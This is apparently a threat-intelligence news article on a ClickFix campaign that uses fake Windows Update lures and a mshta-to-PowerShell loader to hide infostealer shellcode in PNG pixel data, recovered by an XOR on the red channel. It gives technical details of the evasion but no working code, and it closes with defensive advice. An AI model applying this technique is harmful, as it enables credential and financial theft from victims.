Cybercriminals are employing a sophisticated new tactic, combining the social engineering lure of “ClickFix” with advanced steganography techniques to hide malicious payloads within seemingly harmless PNG image files. This evolving attack strategy, detailed by Huntress analysts, represents a significant shift in how threat actors deliver information-stealing malware to unsuspecting victims.
The ClickFix attack chain ensnares users by tricking them into manually executing commands through the Windows Run prompt. Initial infection vectors often involve convincing lures such as fake robot verification screens or notifications mimicking legitimate Windows Update processes. These deceptive interfaces guide users to press Win+R to open the Run dialog and paste a command that has been automatically copied to their clipboard, initiating a multi-stage attack.
Steganographic Payload Concealment in ClickFix Attacks
The most alarming aspect of this campaign is the method used to conceal the final stages of the malware. Instead of appending malicious data to image files, attackers are utilizing a custom steganographic algorithm to encode shellcode directly within the pixel data of PNG images. This technique leverages specific color channels, primarily the red channel, to reconstruct and decrypt the payload entirely in memory, making it difficult for traditional security solutions to detect.
According to Huntress researchers, this campaign emerged in October 2023 and has since evolved through two distinct variants. Early “Human Verification” lures have been largely replaced by more convincing fake Windows Update screens. These newer lures present a full-screen, realistic mimicry of Microsoft updates, complete with “Working on updates” animations, before prompting the user to execute the ClickFix command.
The infection mechanism commences with an `mshta.exe` command that contains a hexadecimal-encoded IP address within its second octet. This command triggers a PowerShell loader responsible for dynamically decrypting and reflectively loading a .NET assembly. This assembly then functions as a steganographic loader, extracting shellcode that is hidden within an encrypted PNG image embedded as a manifest resource.
The extraction process meticulously utilizes the bitmap’s raw pixel data. It calculates specific offsets for each row and column and then applies an XOR operation with the value 114 to the red channel to recover the encrypted shellcode bytes. Following extraction, the shellcode is packed using Donut, a tool designed to enable in-memory execution of .NET assemblies.
Huntress researchers have identified that the final payloads delivered through this sophisticated method include prevalent information-stealing malware such as LummaC2 and Rhadamanthys. These malware families are specifically designed to pilfer sensitive user credentials and financial information from compromised systems.
This campaign highlights the continuous innovation by threat actors in evading detection. By embedding payloads within the pixel data of images rather than relying on conventional file structures, attackers significantly complicate analysis and bypass signature-based detection systems. However, the fundamental success of these attacks still hinges on social engineering – convincing users to manually execute commands.
Organizations looking to defend against these threats should prioritize robust user awareness training. Additionally, technical controls such as disabling the Windows Run box through registry modifications or Group Policy can serve as a critical preventative measure against this specific attack vector. The ongoing evolution of these techniques suggests that defensive strategies must adapt to incorporate behavioral analysis and memory inspection.